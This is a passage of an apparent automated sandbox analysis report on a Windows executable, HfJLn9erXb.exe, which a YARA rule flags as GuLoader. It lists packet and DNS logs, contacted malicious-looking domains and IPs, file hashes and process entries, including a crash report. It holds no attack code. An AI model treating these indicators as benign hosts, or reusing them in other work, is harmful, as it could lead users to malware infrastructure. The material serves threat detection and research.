                Mar 17, 2023 20:59:19.063379049 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.063426018 CET4980180192.168.11.2085.95.248.49
                Mar 17, 2023 20:59:19.063541889 CET804980185.95.248.49192.168.11.20
                Mar 17, 2023 20:59:19.063590050 CET4980180192.168.11.2085.95.248.49
                TimestampSource PortDest PortSource IPDest IP
                Mar 17, 2023 20:59:17.661098003 CET6036953192.168.11.209.9.9.9
                Mar 17, 2023 20:59:17.877599955 CET53603699.9.9.9192.168.11.20
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 17, 2023 20:59:17.661098003 CET192.168.11.209.9.9.90xa637Standard query (0)ruhsalgelisim.comA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 17, 2023 20:59:17.877599955 CET9.9.9.9192.168.11.200xa637No error (0)ruhsalgelisim.com85.95.248.49A (IP address)IN (0x0001)false
                • ruhsalgelisim.com
                • 185.246.220.85

                Click to jump to process

                Target ID:2
                Start time:20:58:43
                Start date:17/03/2023
                Path:C:\Users\user\Desktop\HfJLn9erXb.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\HfJLn9erXb.exe
                Imagebase:0x400000
                File size:335976 bytes
                MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1379713929.000000000348C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low

                Target ID:7
                Start time:20:59:04
                Start date:17/03/2023
                Path:C:\Users\user\Desktop\HfJLn9erXb.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\Desktop\HfJLn9erXb.exe
                Imagebase:0x400000
                File size:335976 bytes
                MD5 hash:049ECAD4587538C292E3EBEEE5947EB5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:18
                Start time:20:59:21
                Start date:17/03/2023
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 1368
                Imagebase:0x3e0000
                File size:482640 bytes
                MD5 hash:40A149513D721F096DDF50C04DA2F01F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                No disassembly